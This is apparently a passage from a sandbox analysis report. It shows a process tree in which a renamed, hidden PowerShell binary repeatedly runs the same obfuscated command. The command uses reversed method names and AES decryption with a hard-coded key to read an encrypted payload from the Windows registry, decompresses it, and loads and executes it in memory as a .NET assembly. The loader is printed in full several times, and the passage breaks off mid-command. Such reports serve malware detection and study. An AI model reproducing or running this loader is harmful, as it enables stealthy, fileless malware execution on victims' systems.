$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:5560
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:2848
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:9948
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:9960
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 